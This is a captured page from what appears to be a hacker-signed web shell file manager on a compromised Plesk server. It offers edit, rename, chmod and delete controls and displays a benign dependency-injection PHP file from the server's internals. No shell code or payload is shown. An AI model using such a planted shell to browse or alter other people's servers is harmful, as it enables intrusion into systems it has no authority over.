Submit
Path:
~
/
/
proc
/
self
/
root
/
opt
/
psa
/
admin
/
plib
/
modules
/
monitoring
/
vendor
/
elie29
/
zend-phpdi-config
/
src
/
File Content:
ContainerFactory.php
<?php declare (strict_types=1); namespace PleskMonitoring\Elie\PHPDI\Config; use PleskMonitoring\DI\ContainerBuilder; use Exception; use PleskMonitoring\Psr\Container\ContainerInterface; class ContainerFactory { /** * @throws Exception */ public function __invoke(ConfigInterface $config) : ContainerInterface { $builder = new ContainerBuilder(); $config->configureContainer($builder); return $builder->build(); } }
Edit
Rename
Chmod
Delete
FILE
FOLDER
INFO
Name
Size
Permission
Action
Tool
---
0755
Config.php
5662 bytes
0644
ConfigInterface.php
478 bytes
0644
ContainerFactory.php
468 bytes
0644
N4ST4R_ID | Naxtarrr